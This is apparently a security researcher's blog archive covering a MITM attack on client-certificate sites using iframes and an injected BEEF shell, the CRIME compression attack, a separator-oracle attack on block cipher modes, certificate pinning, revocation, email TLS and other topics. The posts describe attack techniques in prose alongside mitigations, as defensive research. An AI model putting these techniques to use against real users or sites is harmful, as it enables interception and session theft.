Most websites authenticate a user using a username and password over HTTP. If an attacker is able to impersonate a website to a user they are able to use that ability to steal the username and password, talk to the website pretending to be the user, and proxy the data back and forth. Client certificates provide a stronger degree of authentication. An attacker can impersonate a website to a user, but cannot impersonate the user to the website because they do not know the client's private key. This severely limits the attacker: generally speaking the attacker is interested in learning the user's stored data on the server: for example the user's email. To accomplish this when the user authenticates with client certificates, the attacker would need the client certificate - to retrieve it they would have to exploit the user's browser or try a social engineering attack to trick the user into running malware manually. While those attacks are possible, they are not reliable or stealthy.

However, an attacker who is able to impersonate the server to the user can effectively break into the SSL connection with the legitimate server, and exfiltrate the sensitive data - even with client certificate authentication. In addition to impersonating the server, the attacker must be able to intercept and manipulate the client's outbound network traffic. By relying on the Same Origin Policy, the attacker can trick the client into running javascript of the attacker's choosing that exfiltrates the data - while leaving the Client Certificate-authenticated SSL channel untouched.

There are two techniques one can use to accomplish this. The simpler technique relies on impersonating any third-party SSL-protected javascript include - for example to target Google's hosted libraries. By acting as Google, you can inject a BEEF shell and view the user's content.

That's a pretty obvious technique - by including two forms of authentication (mutual and one-sided) the site has effectively downgraded themselves to the lesser of the two. However, if the site has removed all third-party includes and authenticates all javascript using Client Certificates - it is still possible to perform the attack. In this instance, Alice tries to connect to Bob's site, but is intercepted by Mallory. Mallory can impersonate Bob to Alice, but cannot impersonate Alice to Bob, because Alice connects using a client certificate.

With this new attack technique, Alice tries to connect to Bob, but is intercepted by Mallory. Mallory impersonates Bob to Alice, and requests a client certificate, which Alice expects. Alice selects her client certificate, which Mallory will accept without performing any certificate validation. After the TLS handshake is complete, Mallory returns a page that looks like this:

Mallory also sends a HTTP Connection:close directive and closes the SSL and TCP connection.

When Alice retrieves this page, she will make two subsequent connections. First, the request for d.js, which Mallory fields and replies with a BEEF shell or similar mechanism that allows her to control the page. Secondly, the request for mail.corp.com for the iframe, which Mallory does _not_ intercept, but rather passes the connection to Bob legitimately. Alice initiates a new TLS handshake, authenticates herself to Bob, Bob authenticates himself to Alice, and the channel is mutually trusted. Mallory cannot read inside this connection, but using her javascript shell, can manipulate the page in the iframe thanks to the same-origin policy.

A more insidious attack would be to poison the user's browser cache or HTML5 Local Storage. For a cache poisoning attack, because a javascript file does not contain user-specific or attacker-unknown data, an attacker could download the server's version of the Javascript file, using their valid credentials, poison it, and then serve it to the attacked user. If the attacker can force the browser into caching the document, it will be used on subsequent connections to the site, giving the attacker full control again. For HTML5 Local Storage, if a site used the clientside storage to store data or code, an attacker could read sensitive data or insert malicious javascript.

Unfortunately, there's not much that can be changed in browsers to mitigate this attack. Any form of short-term certificate pinning (as is done with DNS to thwart DNS Rebinding will break some use of certificates on the internet: either different certificates on subdomains, CDNs, paths that route to a new webserver, or the case where every webserver has its own SSL Certificate (the 'Citi Bank' problem as dubbed by Moxie.)

One mitigation is to prevent yourself from being framed using the X-FRAME-OPTIONS: DENY setting (SAMEORIGIN will leave you vulnerable), and pairing this with javascript framebusting for older clients. However, this does not protect against browser cache or local storage poisoning.

This post originally appeared on iSEC Partners' blog.

Fixing revocation for web browsers on the internet

07 Jan 2013 21:32 EST

This is a tad dated, but I need to catch this blog up to the blog posts I've authored for my employer's blog. Here's the blurb for a whitepaper I authored on revocation in web browsers.

The past couple years have had a number of Certificate Authority compromises that have resulted in high-profile sites having fraudulent certificates issued for them. It has shown a spotlight on Certificate Authority practices and also the current trust calculation present in web browsers. Two years ago, iSEC Partners collaborated with the EFF to create the SSL Observatory: a window into the issuing practices of CAs and this year released a scanning tool:sslyze that can be used to scan for SSL misconfigurations. SSL is a critical piece of Internet infrastructure and has been a long time research focus for iSEC Partners.

Recently, I've been interacting with the Certificate Authority/Browser forum on the topic of Certificate Revocation. Many projects like DANE, Convergence, TACK, and numerous others all cover the topic of initial trust - do I trust this certificate or not - the issue of revocation has been left largely alone with the exception of Chrome developing crl-sets. But recovering from failure is at least as important as protecting ourselves from it in the first place, so we have an interest in making sure Revocation provides the properties that we desire. At the September meeting of the CA/B Forum, I presented what I feel is the correct path forward for revocation checking in web browsers.

The paper I presented identifies five key properties a revocation system should provide: to be Privacy Preserving, to be Performant, to have No Single Point of Failure, to Uniquely Identify a Certificate, and finally, to be Effective. After evaluating the possible ways forward, I suggest the path of least resistance and the methodology that can be followed to move us towards a web where you are confident in the status of a certificate. Unfortunately, this requires a concerted effort to develop, test, and deploy updated versions of web servers and convince stakeholders of the benefits of doing so. This paper is meant to spur conversation and be a proposal that others can be compared to. The discussion at the CAB forum overall was positive, and I appreciated the opportunity to meet and discuss these issues with people who also care passionately about this niche of the web infrastructure.

Read our whitepaper Here

This post originally appeared on iSEC Partners' blog.

Some Initial Thoughts on Pond

24 Nov 2012 17:11 EST

Pond is a personal project published this weekend by Adam Langley. Adam is wicked smart and manages both Google's SSL infrastructure and Chrome's SSL implementation (and all the nifty SSL features Chrome throws in, like NPN and DNSSEC Stapled Certs). So when he tweeted about Pond, I knew it was worth a very close look. Pond is a new encrypted messaging protocol and implementation, akin to encrypted E-Mail but with some differences. This blog post is less a critical analysis of it's security or design, and is really just some initial thoughts on the architecture. It's light on the introduction, so you may want to read the project's README for background.

Permitted Senders

Firstly, Pond can be thought of similar to email. It's asynchronous, which means you can send messages to someone even if they're not 'online', and a server will receive and store them on the user's behalf. The user can in turn connect to their server and retrieve messages when their client is online. However, the first big difference between Pond and E-mail is you cannot 'pond' someone who has not permitted it, where 'pond' is me verbing the noun. This is a huge, huge difference between Pond and E-Mail, and honestly I think makes Pond much less useful than I'd like. The reason behind this is Spam, and that's not a bad reason. I'm a bit young to have been around when the 'require email to have a proof of work' arguments were ensuing, but a cursory survey indicates one argument against it was based around legitimate bulk email services. I don't know if that's relevant to Pond, so perhaps it's worth revisiting this debate.

Anyway, Pond enforces the notion of allowed senders, by using a group signature scheme. The group signature scheme allows your pondserver (analogous to mailserver) to verify that the person ponding you is a member of your allowed group, but cannot verify who exactly in the group it is. If you want to revoke the ability of someone to pond you, you can do that, but everyone on your accepted list will learn that you revoked someone.

Because messages are forward secure and the protocol is based on OTR, you the user must communicate a KeyExchange message to you intended acceptable contact out of band on a secure channel. The KeyExchange message includes less sensitive things like your server address, and private things like the private key for that particular user to participate in the group signature.

Message Sizes

All messages that are exchanged between the client and the server are 16KB - whether the user is checking his messages, sending a message, making a revocation, or otherwise. Pond currently does not support messages larger than 16KB. I wish I had a blog post written on how remailers handle oversized messages - it's not pretty. This is a hard problem. Both Mixmaster and Mixminion will chunk oversized messages into the constant-sized fragments; although Mixminion will apply a K of N scheme to allow reconstruction from a subset of fragments.

The issue with oversized messages is that they can allow a user to be deanonymized by sending them oversized messages. Send a user a 500MB message, and then watch all Remailer/Pond users to see who retrieves a 500Mb message. This is easier when the attacker is the sender of the large file but can work regardless if the attacker knows a large file is going to be sent. There's not a great solution for this problem - but it's a pretty important one to at least try to solve. It's fairly easy to anonymously/pseudonymously send text, we have a number of techniques. But sending media: images, video, pdfs - we don't have a great system for.

Future Directions

Some things I think would be worth looking much closer at:

Does the omission of the KeyID in the OTR Protocol hurt anything?
The implications of a KeyExchange structure being disclosed after a number of messages are exchanged.
Is there a server DoS possibility by asserting the server must confirm the group signature of the client? Can a proof of work be inserted to ameliorate this?
The use of ACKs makes me nervous and remind me of Read Receipts. And no one likes those. Could there be another way to ratchet DH values? Maybe prefill the server with encrypted-to-the-contact value or values to give them?
Does the Pond Server or Client leak distinguishing information in the form of time skew? Probably, but most things do, so don't hold it against Pond.

Also, I think something else that would be worth considering is changing the notion of contacts you can communicate with, to contacts you can communicate large messages with. The changes, which are not trivial, would look like this:

The 16KB size is upped to something more like 128KB.
Your accepted contacts become the "permitted large senders" list. These users are permitted to send you messages larger than 128KB. It'd be nice to restrict them to 32KB, but this may not be possible while asserting that the server cannot read the messages for a user.
A server will either send the list of queued messages if the contents of the list is >128KB or whole messages if less.
Messages larger than 128KB are not downloaded by default - the user can choose to delete them on the server, explictly download them as one-time-large chunk, or perform a de- and re-encryption on the server to be able to download the message in 128KB chunks.
When an unaccepted contact wants to pond you, the server will conduct the initial steps of the DH Key Exchange on behalf of the user, packages up the sensitive parts for the user, and queue them for delivery to the user also.

That list is very handwavey - I haven't really thought through the implications of things like the de- and re-encryption on the server; or the change in threat model. For instance, if a server is compromised after an untrusted person ponds you, the attacker should not be able to read those queued messages; but if a new untrusted person ponds you post-compromise, the attacker would be able to read that message. That may be unacceptable. The IMAP/Newsgroup nature of getting a list of messages and choosing to download individual ones might be a horrible idea too. Pond is experimental. I'm happy to throw out a bunch more experimental ideas and try to figure out why they're bad ideas.

Also, I'd like to take this opportunity to thank Adam for his work. This is experimental software and an experimental protocol. But experiments are good.

Update: If you're reading this on the front page, be sure to click through to see Adam's comment response.

Certificate Authorities & Pinning

10 Nov 2012 20:53 EST

So Google Chrome has a preloaded list of sites they can force SSL on (Strict Transport Security) and certificates they can pin up to (Public Key Pinning). You can request yourself be added to this list over here. But Chrome is open source, so you can look at the code behind this. The relevant file is in transport_security_state.cc and the actual list of directives is in transport_security_state_static.json. Inside that list of directives (and I'm linking to the latest revision, not trunk), there's a property bad_static_spki_hashes.

//   bad_static_spki_hashes: (optional list of strings) the set of forbidden SPKIs hashes

If we look at the only time that's used, it's used by Google.

    {
      "name": "google",
      "static_spki_hashes": [
        "VeriSignClass3",
        "VeriSignClass3_G3",
        "Google1024",
        "Google2048",
        "EquifaxSecureCA"
      ],
      "bad_static_spki_hashes": [
        "Aetna",
        "Intel",
        "TCTrustCenter",
        "Vodafone"
      ]
    },

Those certificates: Aetna, Intel, TCTrustCenter, and Vodafone are defined in transport_security_state_static.certs (again, revision specific not trunk). They were added in this diff with the comment "net: reject other intermediates from Equifax" which references a private code review request and bug. When I open them on Windows 7, they all chain to the GeoTrust root with fingerprint d23209ad23d314232174e40d7f9d62139786633a. GeoTrust (who bought Equifax's CA program) is the company that ran the GeoRoot program, allowing companies to have their own root.

Are these MITM Certificates? No. But before I explain how they're not, a little background:

The practice of issuing companies publicly trusted Certificate Authorities for the purpose of performing MITM on their employees is extremely shady and dangerous and resulted in lots of bad press for Trustwave when they issued one to Micros Systems. They revoked it, and came clean - and I applauded them for it. In the fallout, Mozilla told CAs they couldn't do this and be included in their root program. They had to either not let the root out of their control or technically or contractually constrain them explicitly disallowing MITM purposes.

The responses from the CAs came back. Geotrust said "SubCAs are technically and/or contractually restricted to only issue certificates to domains that they legitimately own or control, and they are specifically not allowed to use their subordinate certificates for the purpose of MITM." And also that they were in the process of "[adding] a statement to [their] CP/CPS committing that [the company] will not issue a subordinate certificate that can be used for MITM or 'traffic management' of domain names or IPs that the certificate holder does not legitimately own or control." And let's take a look at the four certificates blacklisted in Chrome:

Vodafone & Aetna: Vodafone expired in July 2011, Aetna in Aug 2012. Looking at Mozilla's and Windows' Trust Store I don't see an Aetna or a Vodafone.
Intel: This is a valid, trusted Signing CA that is still valid. It can do a lot too: Digital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing. It has a Public CRL that refreshes every three months with no entries. Its other pointers go to unresolvable domains. I can't find an Intel in my trust stores.
TC TrustCenter: This is the strangest one to me - because I do have it in my Trust Store. I have "TC Trust Center Class 2 CA II", "TC Trust Center Universal CA I" and "III", and "TC Trust Center Class 3 CA II" in Mozilla and nothing in Windows (but Windows has some weird polling-the-server stuff IIRC). So if some of TC Trust Center is trusted, why isn't this one? Also, it's still valid. It's CRL is GeoTrust's.

Now these are not MITM certificates. They have been in use on the public internet, and if you search through the SSL Observatory data you will find both the certificates and instances of their signing public certificates. So it's pretty clear these aren't hidden certificates or anything. But the existence of these certificates is still troubling for a brand-new reason: Certificate Pinning.

Certificate Pinning - either by TACK, the upcoming HTTP Header, Chrome's aforementioned system, or other methods - allows you to pin to a leaf certificate or a Certificate Authority's root. If clients see a certificate signed by anything other than the pinned certificate (key, technically) - they will reject the certificate. It allows you to limit the number of signing CAs from dozens or hundreds to a couple of Intermediates. But just how many Intermediate (signing) certificates are off that root you just pinned? You can get a sense of it from the SSL Observatory - but just a sense, because they're not all disclosed.

And that's what Google has done. They wanted to pin GeoTrust - but not these other Intermediates. So they had to go to explicit steps to prevent these four certificates from being able to sign for Google properties, ever ever ever. So if you're evaluating a Certificate Authority, and you want to pin to them, this should factor into your calculations. Mozilla is working on this to provide greater transparency for these 'unknown' Intermediates, which are a subject of great debate.

Details on CRIME

17 Sep 2012 11:11:34 EST

Background

Juliano Rizzo and Thai Duong, the authors of the BEAST attack on SSL (or TLS - used interchangeably here), have released a new attack dubbed CRIME, or Compression Ratio Info-leak Made Easy. The attack allows an attacker to reveal sensitive information that is being passed inside an encrypted SSL tunnel. The most straightforward way to leverage this vulnerability is to use it to retrieve cookies being passed by an application and use them to login to the application as the victim.

CRIME is known to work against SSL Compression and SPDY. SPDY is a special HTTP-like protocol developed by Google, and used sparingly around the web. According to Ivan Ristic's statistics, gathered by SSL Pulse, about 42% of the servers support SSL compression, and SPDY support is at 0.8%. SSL Compression is an optional feature that may or may not be enabled by default - it's unlikely to have been explicitly configured. SPDY however is something that would be explicitly designed into your web application.

Technique

CRIME works by leveraging a property of compression functions, and noting how the length of the compressed data changes. The internals of the compression function are more sophisticated, but this simple example can show how the information leak can be exploited. Imagine the following browser POST:

POST /target HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Cookie: sessionid=d8e8fca2dc0f896fd7cb4cb0031ba249

sessionid=a

This data shown in binary looks like this:

As mentioned, the internals of the DEFLATE compression algorithm are more sophisticated, but the basic algorithm is to look for repeated strings, move them to a dictionary, and replace the actual strings with a reference to the entry in the dictionary. We'll take the above example, and identify two repeated strings we can remove: ".1" and "sessionid=". We'll move them to a dictionary, and replace them with bytes not used in the message (0x00 and 0x01):

This has compressed the message from 195 byte to 187 bytes. In the body of the request, we specified "sessionid=a". Watch what happens when we specify "sessionid=d", which is the first character of the secret session cookie:

Now we've compressed the resulting message from 195 bytes to 186 bytes. An attacker who can observe the size of the SSL packets can use this technique in an adaptive fashion to learn the exact value of the cookie.

As mentioned, the internals of the real deflate have to account for a lot more than this (for example, length of the extracted string) and works with a sliding window across the data (examining the entire data in chunks instead of at once) - but this toy example shows the single byte length difference we are looking for to reveal we've guessed the correct character. For more sophisticated analysis you can check out Thomas Pornin's answer at stackexchange and Krzysztof Kotowicz'a proof of concept code. In the coming weeks we'll also get more details from the authors that explain how they overcame other hurdles to exploitation, such as the Block Cipher Padding in AES.

Exploitation Scenarios

In our toy example above we placed our guess for the cookie in a POST body. Initially, speculation was to exploit CRIME you would require the ability to run JavaScript inside the target domain - such as through a Cross-Site Scripting Attack. Since then, a number of novel techniques have been discussed, including:

Cross Domain requests
moving the payload to the querystring in a GET request
using tags (a method used by Rizzo/Duong)

It's clear that there are an uncountable number of ways to exploit the vulnerability if it is present. Rather than trying to block individual avenues to exploitation - which is likely impossible - we recommend you mitigate the issue at the source by disabling SSL Compression (and SPDY Compression if used.)

Mitigation

Disabling compression is the agreed-upon approach to mitigating the vulnerability. Very few clients support SSL or SPDY Compression, and the major ones that do (Chrome and Firefox) have patched it. Disabling SSL Compression is different from disabling HTTP Compression - and will almost always have no adverse affects (especially because many clients already do not support it). If HTTP Compression is enabled, SSL Compression will only compress HTTP Requests and Response Headers - a small percentage of the traffic compared to the body of web application pages.

At this point, the latest versions of all browsers will not offer Compression in SSL. The following versions were explicitly tested.

All versions of Internet Explorer (No Versions of IE support SSL Compression)
Google Chrome 21.0.1180.89
Firefox 15.0.1
Opera 12.01
Safari 5.1.7 on Windows
Safari 5.1.6 & 6 on OSX Lion

Server-Side Mitigation

In most cases you can rely on clients having been patched to disable compression. If you want to perform due diligence you can disable SSL Compression server-side also. You can test for SSL Compression using the SSL Labs service (look for "Compression" in the Miscellaneous section) or using iSEC Partners' ssl scanning tool SSLyze v0.5.

If you have Compression enabled, the method of disabling it varies depending on the software you're running. If you're using a hardware device or software not listed here, you'll need to check the manual or support options and note that you want to disable SSL Compression - it shouldn't be confused with HTTP Compression.

Apache 2.4 using mod_ssl

Apache 2.4.3 has support for the SSLCompression flag. This is a very new release of Apache - the feature itself was added in August, 2012. SSLCompression is on by default - to disable it specify "SSLCompression off".

Apache 2.2 using mod_ssl

The patch will be backported from Apache 2.4 to Apache 2.2 in 2.2.24 according to the corresponding issue for mod_ssl.

Apache using mod_gnutls

If you are using mod_gnutls you can specify the GnuTLSPriorities flag to disable compression. Specify "!COMP-DEFLATE" to disable compression.

IIS

Microsoft IIS does not support SSL Compression - even in IIS 7.5/Server 2008 R2.

Amazon Elastic Load Balancers

iSEC Partners has confirmed with Amazon that Elastic Load Balancers do not support TLS Compression.

Acknowledgements

Thanks to a few folks for their help in preparing this post: Alex Garbutt, Doug DePerry, Rafael Turner, Rachel Engel, and the team at Second Market.

This post originally appeared on iSEC Partners' blog.

On Couchsurfing's New Terms of Service

2 Sep 2012 00:43:34 EST

Scroll Down for an Update

Recently Couchsurfing sent out an email about their new terms of service. I took a look, and was pretty surprised - even in the world of ridiculous Terms of Services, this one seemed over the top. I fired off a quick rantly message through the only feedback system I could find, tweeted about it, and planned on deleting myself a short while later. However, they replied back to me politely and generically, and I realized I needed to send a more structured response. Below are the first four major things that jumped out at me that I take issue with the new Couchsurfing Terms of Service, as compared to several other major sites' terms. If you likewise think the terms aren't well thought out, I'd encourage you to drop them a polite email as well. The email chain I'm responding to is at the very bottom of the post.

My second email to them

I understand your lawyers want you to cover your ass - and of course there needs to be some permission licensing the content. I'm not uninitiated to the process - so I'm not complaining in the general "you can't do this, this is crazy" stance - I'm complaining in the specific "Even in the world of overly broad Terms of Service - yours is Super-Overly-Broad". I'm not a lawyer but I am interested in this stuff, and from my research here's what I've come up with.

Several of the things I take issue with:

There is no regard to member ownership of content, beyond stating that the member must own the content they upload.
There is no regard to the privacy settings of Couchsurfing Profiles, nor deletion of member content
There is overbroad permission for your use of the content
There is really strange language relating to granting you permission to use my Identity.

I'll reference several other Terms of Services for similar websites, linked at the end.

Regarding #1: Facebook's, yFrog/ImageShack, Yahoo/Flickr's, and MySpace's explicitly state they do not claim ownership of any content, while you do not.

Regarding #2: Facebook takes the same "non-exclusive, transferable, sub-licensable, royalty-free, worldwide license to use any IP content" clause - but they explicitly state that this is subject to the user's Privacy Settings _and_ that the license ends "when you delete your IP content or your account". MySpace's likewise mentions Privacy settings: "except that Content marked 'private' will not be distributed by Myspace outside the Myspace Services and Linked Services" and "After you remove your Content from the Myspace Services we will cease distribution as soon as practicable, and at such time when distribution ceases, the license will terminate." Flickr too: "This license exists only for as long as you elect to continue to include such Content on the Yahoo! Services and will terminate at the time you remove or Yahoo! removes such Content from the Yahoo! Services." And yFrog/ImageShack "You may revoke this permission at any time by requesting your content to be removed."

Regarding #3: The clause "for any purpose" is overbroad. If you wanted to sell people's personal photos for use as stock photography you would be able to. Contrast that with yfrog's "will not sell or distribute your content to third parties or affiliates without your permission" or Yahoo/Flickr's "the license to use, distribute, reproduce, modify, adapt, publicly perform and publicly display such Content on the Yahoo! Services solely for the purpose for which such Content was submitted or made available". Myspace's does not take the abiliy to sell or distribute outside of their site: "This limited license does not grant Myspace the right to sell or otherwise distribute your Content outside of the Myspace Services or Linked Services."

Regarding #4: "without limitation the right to use your name, likeness, voice or identity" You're claiming the right to use my identity?! That's really, really strange, and probably interfaces weirdly with some Identity Theft law somewhere in the US.

Thanks for taking the time to respond to me, and I hope you will take these concerns under consideration.

[0] http://www.facebook.com/legal/terms
[1] http://www.myspace.com/Help/Terms?pm_cmp=ed_footer
[2] http://yfrog.com/page/tos
[3] http://info.yahoo.com/legal/us/yahoo/utos/utos-173.html

Their reply to my first email

Hello Tom

Thank you for writing in to us about the recent changes to our Terms of Use and Privacy Policy. The reason for these changes are to keep up with legal developments here in the United States, as well as to make sure that our policies cover all of the new features that we are planning to introduce to the CouchSurfing community.

In order to display your content on CouchSurfing, such as your profile picture or group posts, we need your permission to do so. When you upload content to CouchSurfing (like photos or group posts) you grant us the right to use it in various ways, such as linking to it and displaying it to other members.

When you send us a Submission such as a photo or a story, we might choose to write a blog post about it or post it to our Facebook, Twitter or other social media pages. If you send us a CouchSurfing design, we may make it into a product on the CS Shop. Please don't send us anything that you would prefer to keep private.

Hopefully this answers your question, but if not feel free to email us back at policies@couchsurfing.com.

Happy Surfing!

Update: I heard back from them over the weekend, and with their permission can post their response.
Their reply to my second email.

Hi Tom,

I'm sorry for the slow response. Hopefully I can address some of your concerns below, and I can certainly understand how the language in section 5.3 sounds over-broad. My responses are specific to your itemized questions.

1) You're right, we don't mention this specifically, although it is true that members do continue to own their own content (with the exception of things submitted directly to us as a Submission under Section 6.0). We originally included plain-english annotations with this new version of our Terms of Use which stated that explicitly, but our concern was that members would make decisions based on the annotations, which, being a summary, would have the potential to mislead them by not including the full information. In such a case, we might be considered liable for distributing bad information. My hope for CouchSurfing is that we can eventually move to completely plain-english policies.

2) Privacy settings are evolving on CouchSurfing. We are working on a complete overhaul to the website, which will include a lot of new features, and new privacy settings will go hand in hand with that. But because we don't know what exactly those new features or privacy settings will be, it is hard to reference them specifically.

3) The license under Section 5.3 gives us the ability to do things like display your name, pictures and other content on the website and through other CouchSurfing products as we develop them. However, it does not give us the ability to do whatever we want with your personal information. We cannot do anything with your information that is not clearly explained in our Privacy Policy. I would encourage you to take a look through that Policy here: http://couchsurfing.com/new_privacy and let me know if you have any further questions. Member privacy is very important to us.

4) This language is broad to allow us to develop new CouchSurfing products and features without having to rewrite the TOU at every turn. But please see above about how our Privacy Policy details exactly how and when we collect, use and share your information.

Hopefully this helps answer your questions, and thank you again for writing in. We truly do appreciate member feedback, and will take you suggestions into account as we continue to improve CouchSurfing.

Kind regards,

Cameron
Legal Counsel
CouchSurfing International, Inc.

An Attack on Unauthenticated Block Cipher Modes - Separator Oracle

25 May 2012 12:24:34 EST

Jon Passki came to me a couple months ago with an idea for a new adaptive ciphertext attack on block cipher modes - similar to the Padding Oracle or Manger's Oracle attacks. I found some ways to extend it, and we wound up collaborating on it - and we're finally able to publish it today.

Certain block cipher confidentiality modes, including CBC, CTR, CFB, and OFB, perform decryption with a final step that performs an XOR with ciphertext - often attacker-controlled. When an application decrypts altered ciphertext and attempts to process the manipulated plaintext, it may disclose information about intermediate values resulting in an oracle. The information disclosed may vary - it could be improper ASN decoding, an invalid timestamp, or what we focus on - invalid delimited values.

We use the common application pattern of encrypting delimited values, such as "username|timestamp|userlevel", and the common practice of raising an exception if the number of delimited values is not accurate. Application code could look like:

    ciphertext = read_from_cookie("sessionid")
    plaintext = decrypt(ciphertext)
    values = plaintext.split("|")
    if len(values) != 3:
        raise Exception("Incorrectly structured values")
    # Continue on processing data

By detecting this exception, which we call a SeparatorException, we are able to mount an adaptive ciphertext attack that allows us to decrypt the ciphertext. Additionally, after learning the plaintext, we can control the decryption to result in an arbitrary plaintext of our choosing. The solution of course is to verify the integrity of the ciphertext using either a Message Authentication Code (MAC) or an Authenticated Encryption Mode. Matt Green has a good blog post about how to choose an Authenticated Encryption mode.

The paper is available in a pdf, and code that demonstrates the attack on several block cipher modes is included at https://github.com/tomrittervg/separator-oracle.

The paper was updated June 3rd. Thanks to Juraj Somorovsky for pointing out some additional work on the subject.

This post originally appeared on iSEC Partners and Aspect Security

On the Sorry State of E-Mail Security

20 May 2012 23:34 EST

Something I've been interested in for the past few months is SSL/TLS, and in particular looking at undetectable attacks.

Censorship is detectable. You know you're being censored. Censorship always implies passive network tapping - the entity has to perform the tap to do the censorship. And censorship itself is an active attack - the entity blocks you from visiting the website.

But passive attacks are usually undetectable from the user's perspective. If a network is being tapped - either a corporate network, or the national backbone - you usually have no way of learning this. We have a pretty good idea that the NSA is tapping large swaths of the Internet, but because it's just whistleblowers it's not considered credible proof. The Swedish version however is well documented.

But active attacks aren't always detectable either. If Chrome didn't have cert pinning, who knows how long DigiNotar would have been undetected. If a CA is compromised, we won't be able to detect an attack. Bugs can bypass certificate validity checking too. It's a dangerous type of client bug that allows undetectable MITM, but we've seen them. And if a client isn't checking for the validity of a certificate, an attacker doesn't need a bug or CA compromise, they can just perform a MITM with a self-signed certificate.

When we think of "SSL clients" we think of web browsers. Sometimes email uses SSL too. Not always. When it doesn't, it's obviously easy to tap and read. But when it does, it's not much better.

Your individual client - Outlook or Thunderbird will require a valid certificate if it's configured to use SSL. But there's more to it than that. Without going into too much detail, Outlook is a Mail User Agent (MUA), and it talks to a Mail Transfer Agent (MTA). When you send an email, your MUA transfers it to a MTA, and the MTA transfers it to another MTA. That MTA-to-MTA transfer is rarely protected by SSL. When it is protected it rarely has a valid certificate. Even if it does have a valid certificate, it's almost never that a MTA requires a valid certificate.

The end result of this is that our entire email infrastructure is vulnerable to passive eavesdropping and undetectable active attacks. We have statistics. And we have examples. You can use the very awesome CheckTLS.com to run some tests on different mail servers. I ran a few tests myself:

Valid SSL Certificate
- Paypal
- Wells Fargo
- Bank of America
- PNC Bank
- StartSSL
- GeoTrust
- Thawte
- Visa
- VMWare
Has Invalid SSL Certificate

Google/Gmail, including Twitter and Github
Google Voice e.g. txt.voice.google.com
Youtube - bad wildcard
J.P. Morgan Chase
Citibank
ING Direct
Amazon
Tor Project (self-signed)
EFF (For a strange reason..)
Comodo (For a strange reason..)
Digicert (For a strange reason..)

Has no SSL Certificate

Hotmail
Yahoo
Facebook
Mail.com
Live
Mint.com
Discover Card
Entrust

There's no ubiquitous e-mail encryption (S/MIME or PGP), there's no requirement for a valid SSL certificate (for what it's worth), and there's no requirement for SSL at all. And there's no global plan for fixing it either. Yet.

Footnotes:

OONI, or the Open Observatory of Network Interference, was introduced at RECon 2011 (video of talk) and is a tool to detect surveillance and censorship in the world.

Even though Outlook and Thunderbird will require a valid CA-signed certificate if they're configured to use SSL, there's no Cert Patrol or Convergence for a mail client, so you'd never detect a CA compromise.

Black Hat EU Presentation: The IETF & The Future of Security Protocols

14 Mar 2012 04:05 EST

Just two weeks (to the day) after presenting Cloud & Control at RSA in San Francisco, I was in Amsterdam presenting at Black Hat EU. I've been getting more involved with the tremendous number of standards bodies and keeping track in my own head on what improvements are coming down the pipe - I decided it'd be worthwhile to quantify that in a talk (and whitepaper). The talk actually only brushes over some of the topics that I thought would be the most interesting to talk about - the whitepaper and slides contain way more info.

According to my filters, I'm on over 50 mailing lists and keeping track of everything is a pain - so I did it for you. The whitepaper, available here, covers a lot of topics. Improvements in and coming soon to browsers like Content Security Policy, Caja, Strict Transport Security, and Key Pinning; achieving authenticity through DNSSEC; and huge sections on TLS and PKI. I go into detail on TLS 1.1 and 1.2 including implementation issues, deployment, and why we'll never actually get the security of the protocols until we remove backwards compatibility; but also upcoming TLS changes like False Start and Next Protocol Negotiation. A couple larger topics in TLS like Channel Binding and Secure Remote Password, and a lot of smaller topics like Datagram TLS and Encrypted Client Certificates. Finally, I survey all the proposed fixes or replacements for the Certificate Authority system, from the very popularized like Convergence to the very obscure like YURLs. I pull out all the core concepts from the proposals to come up with a list of properties that can be used to evaluate all of the proposals and see where each falls short.

I put way more effort into the whitepaper than I think Black Hat expects, but once I started working on it I wanted it to be complete. It's likely to have some changes made - the current version is dated March 15, 2012, and is the first revision, containing a typo fix and a minor correction relating to RFC 5705 thanks to Adam Langley.

Update: The video has been posted by Black Hat. 160MB MP4.

An Open Letter to The Calyx Institute

29 Oct 2011 15:36 EST

Calyx Institute, Nick, et al

I can't express how impressed and inspired I was by Nick's prolonged legal battle. His willingness to stay the course, challenge the system meaningfully, and effect change is an inspiration to anyone who considers themselves a free speech advocate.

I want to make The Calyx Institute aware of a severe deficiency online, and hope to inspire you to do what you can about it. There are a number of individuals, nonprofits, and organizations that have run free-speech programs and services for years. But this has always been done ad-hoc, often resulting in problems and headaches. Services like Tor and remailers do generate legitimate abuse complaints. But these abuse complaints are often automated and ultimately do not stand up to the safe harbor provisions as a common carrier.

But that doesn't mean that Tor operators aren't forced to bounce hosting providers often. There doesn't seem to be any meaningful way for people to host these services without worrying at night about whether it will be there in the morning [1]. I won't confess to completely understanding the landscape of ISPs, ARIN, peering, and abuse contacts - but I do know there seems to be no way as an individual or even non-profit to find a reasonably priced host that supports free speech. I'm not looking for a host that turns a blind eye towards illegal activity, just one that understands that abuse notifications sent to a common carrier often have no teeth, and will pass them along to be dealt with by the individuals running the services.

I think the Calyx Institute, having been founded by someone who does understand the landscape, is uniquely situated in this area. It's not so much a matter of providing advice, as for years we've all talked to hosting providers until we're blue in the face - and still we got dropped by our providers. I hope Calyx Institute can grow to actually provide or partner with someone to provide the service, uplink, IP addresses, or whatever is needed to let individuals and organizations host our legal free-speech services. And give us the peace of mind to fight our own battles against corporations and the government - without also fighting our hosting provider.

-tom

Cosignatures:

[1] You can browse the torservers mailing list archives for some insight into the problems. http://www.freelists.org/archive/torservers/

Ekoparty Presentation: Cloud & Control

27 Sep 2011 23:05 EST

I gave my first presentation at a security conference on Friday, presenting at ekoparty on some work I did at the beginning of the year on distributing complex tasks to hundreds or thousands of computers. SETI@Home was the project that pioneered the idea of distributed volunteer computing, and their command & control software evolved into a generic project called BOINC. You can run just about any application in BOINC - whether it's open or closed source, uses GPUs, the network, or even if it's not CPU intensive (like nmapping the internet).

Setting up a server isn't the most exciting topic to talk about, so I used two examples to illustrate BOINC in my presentation: factoring RSA512 to recover the private key to SSL certificates or PGP keys and cracking passwords. Factoring was a huge success, but cracking didn't work out that well. BOINC was able to distribute the work and crack things really quickly - by splitting up wordlists automatically based on hash functions I was able to scale out to more machines than I think most people are able to... but the problem came from never actually looking at the output. The best crackers, especially in cracking contests, find patterns in the cracked passwords to make mangling rules and masks and crack more passwords. You could still use BOINC as a work distributor to scale out, but you need to be behind the wheel making work units - not use it as a fire-and-forget system.

